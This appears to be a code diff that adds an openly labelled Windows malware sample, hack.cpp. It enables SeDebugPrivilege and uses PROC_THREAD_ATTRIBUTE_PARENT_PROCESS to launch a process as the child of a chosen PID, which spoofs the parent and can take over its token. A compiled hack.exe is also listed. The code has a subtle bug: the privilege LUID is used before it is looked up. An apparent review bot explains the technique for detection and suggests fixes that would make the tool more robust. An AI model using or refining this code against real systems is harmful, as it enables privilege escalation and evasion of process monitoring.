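--- a/README.md
+++ b/README.md
@@ -0,0 +1,6 @@
+# APT techniques: Access Token theft via UpdateProcThreadAttribute. C++ malware implementation.
+
+APT techniques: Access Token theft via UpdateProcThreadAttribute and CreateProcessW. C++ implementation example.
+
+[https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html](https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html)
+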
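--- a/hack.cpp
+++ b/hack.cpp
@@ -0,0 +1,58 @@
+/*
+hack.cpp
+token theft via
+UpdateProcThreadAttribute
+author: @cocomelonc
+https://cocomelonc.github.io/malware/2022/10/28/token-theft-2.html
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <iostream>
+
+// set privilege
+BOOL setPrivilege(LPCTSTR priv) {
+ HANDLE token;
+ TOKEN_PRIVILEGES tp;
+ LUID luid;
+ BOOL res = TRUE;
+
+ tp.PrivilegeCount = 1;
+ tp.Privileges[0].Luid = luid;
+ tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+
+ if (!LookupPrivilegeValue(NULL, priv, &luid)) res = FALSE;
+ if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token)) res = FALSE;
+ if (!AdjustTokenPrivileges(token, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) res = FALSE;
+ printf(res ? "successfully enable %s :)\n" : "failed to enable %s :(\n", priv);
+ return res;
+}
+
+// create process
+BOOL createProcess(DWORD pid, LPCWSTR app) {
+ STARTUPINFOEXW si;
+ PROCESS_INFORMATION pi;
+ SIZE_T size;
+ BOOL res = TRUE;
+ HANDLE ph = OpenProcess(PROCESS_CREATE_PROCESS, false, pid);
+ printf(ph ? "successfully open process :)\n" : "failed to open process :(\n");
+
+ ZeroMemory(&si, sizeof(STARTUPINFOEXW));
+ ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
+ InitializeProcThreadAttributeList(NULL, 1, 0, &size);
+ si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
+ InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
+ UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &ph, sizeof(HANDLE), NULL, NULL);
+ si.StartupInfo.cb = sizeof(STARTUPINFOEXW);
+
+ res = CreateProcessW(app, NULL, NULL, NULL, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
+ printf(res ? "successfully create process :)\n" : "failed to create process :(\n");
+ return res;
+}
+
+int main(int argc, char** argv) {
+ if (!setPrivilege(SE_DEBUG_NAME)) return -1;
+ DWORD pid = atoi(argv[1]);
+ if (!createProcess(pid, L"C:\\Windows\\System32\\mspaint.exe")) return -1;
+ return 0;
+}
+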
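Review bot: The header comment of hack.cpp (lines 1–7) names the technique but not its observable effect, which is what a reader studying this for detection needs: the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute set on line 44 makes the process `pid` the recorded parent of the new mspaint.exe, so the child appears to have been started by `pid` (and, per the README, runs under that parent's token) while the actual creator does not appear in the child's parent chain. A comment above line 44 such as `// child is reported as a child of pid, not of this process (parent spoofing); the creator is absent from the child's lineage` would make that explicit. main dereferences `argv[1]` without checking `argc`, so running the binary with no argument is a null dereference; `if (argc < 2) return -1;` before line 54 covers it. The OpenProcess handle, the attribute list and the PROCESS_INFORMATION handles are never released, though the process exits immediately after, so this is a hygiene point rather than a functional one.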
  • hack.exe
    Binary file.